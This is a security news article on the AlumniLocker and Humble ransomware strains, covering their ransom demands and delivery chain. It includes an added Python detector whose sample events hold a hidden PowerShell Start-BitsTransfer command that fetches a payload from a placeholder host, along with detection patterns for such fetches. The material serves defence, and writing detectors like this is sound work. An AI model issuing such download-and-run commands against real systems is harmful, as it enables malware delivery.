Beware of ‘AlumniLocker’ and ‘Humble,’ Two New Ransomware Strains

  • Two new ransomware strains are being actively distributed, and both are effective at what they do.
  • The first is already operating at a mature level, demanding a large ransom and threatening to publish stolen data.
  • The second appears to be in a testing phase, demanding a small, almost symbolic amount.

Researchers at Trend Micro have sampled two new ransomware variants, “AlumniLocker” and “Humble,” which exhibit worryingly sophisticated post-encryption techniques. The first strain belongs in the same category as established players in the field, as it asks for high ransom amounts and has featured a data leak portal for extortion since the very start of its operation.

This is a very alarming finding in general, as it shows that ransomware actors now treat the double-extortion of data stealing and data encryption as a standard requirement.

AlumniLocker appears to be a variant of the Thanos ransomware family, and its operators are asking for a ransom payment of 10 bitcoins. The victims are threatened that if they don’t send the requested amount within 48 hours, their data will be published on the actor’s leak site. That’s a pretty short time for such a large amount of money.

Source: Trend Micro

The infection channel for AlumniLocker is typically a PDF file that arrives via email as an attachment. Usually, the subject has something to do with an invoice that supposedly requires the recipient’s attention.

Inside the PDF there is a URL. If clicked, it downloads a ZIP archive containing the downloader, which launches a PowerShell script; finally, the ransomware payload is fetched and executed through a BITS (Background Intelligent Transfer Service) transfer.
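The delivery chain just described, turned into a detection check as an added example (this is not code from the Trend Micro report): it walks constructed Sysmon-style process-creation records and flags a BITS fetch issued by a process descending from a binary run out of a user-writable staging folder, such as Explorer's built-in ZIP extraction directory. The field names, process ids, paths and URL are assumptions made for the example.

```python
"""Flag the PDF -> ZIP -> downloader -> PowerShell -> BITS delivery chain in
Sysmon-style process-creation records. All events below are constructed."""
import re

# Constructed sample events: process id, parent id, image path, command line.
EVENTS = [
    {"pid": "p1", "ppid": None, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    # Explorer runs an executable straight out of a ZIP it opened (Temp1_*.zip).
    {"pid": "p2", "ppid": "p1",
     "image": r"C:\Users\bob\AppData\Local\Temp\Temp1_invoice.zip\invoice.exe",
     "cmd": "invoice.exe"},
    # The downloader spawns hidden PowerShell that fetches the payload via BITS.
    {"pid": "p3", "ppid": "p2",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell.exe -w hidden -c "Start-BitsTransfer -Source '
            'https://example.invalid/p.bin -Destination $env:TEMP\\p.exe"'},
    # Benign: an admin's interactive PowerShell started from Explorer.
    {"pid": "p4", "ppid": "p1",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -c Get-Date"},
]

BITS_FETCH = re.compile(r"Start-BitsTransfer|bitsadmin(\.exe)?\s+/transfer", re.I)
# Executables launched from user-writable staging locations, including
# Explorer's ZIP extraction folder (%TEMP%\Temp1_<archive>.zip\).
STAGING_PATH = re.compile(r"\\AppData\\Local\\Temp\\|\\Downloads\\", re.I)

def ancestry(by_pid, pid):
    """Return the process and its ancestors, nearest first."""
    chain = []
    while pid is not None and pid in by_pid:
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain

def find_bits_download_chains(events):
    """Return the processes that issue a BITS fetch while descending from a
    binary executed out of a user-writable staging path."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if not BITS_FETCH.search(e["cmd"]):
            continue
        staged = [a["image"] for a in ancestry(by_pid, e["pid"])[1:]
                  if STAGING_PATH.search(a["image"])]
        if staged:
            hits.append({"pid": e["pid"], "staged_parent": staged[0]})
    return hits

if __name__ == "__main__":
    for h in find_bits_download_chains(EVENTS):
        print(f"suspicious BITS fetch by {h['pid']} under {h['staged_parent']}")
```

On a real host the same logic would run over Sysmon Event ID 1 records; the interactive PowerShell (p4) is not flagged because it neither issues a BITS transfer nor descends from a staged binary.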

The second new strain, Humble, first appeared in the wild in February 2021, compiled with an executable wrapper and using a public Discord webhook service to report infections. Humble is very aggressive: it doesn’t even allow explorer.exe to access or view local storage drives, and it threatens victims that if they dare to restart their machine, it will rewrite the master boot record (MBR).

Source: Trend Micro

The malware abuses the Windows certificate service to generate a key from randomized input and then uses it in the “extd.exe” component to encrypt the victim’s files. In total, Humble targets 104 file types, including .exe, .pdf, .mp3, .jpeg, .cc, .java, and .sys.

Humble’s ransom demand is very low, at just 0.0002 bitcoins, and the time to pay is a “comfortable” five days. The operators may have set the ransom so low because they are only testing their payment processing system and need to ensure that victims actually pay. That said, we may soon see Humble’s demands increase, as it is very unlikely that the actors will keep their targeting focused on home users.
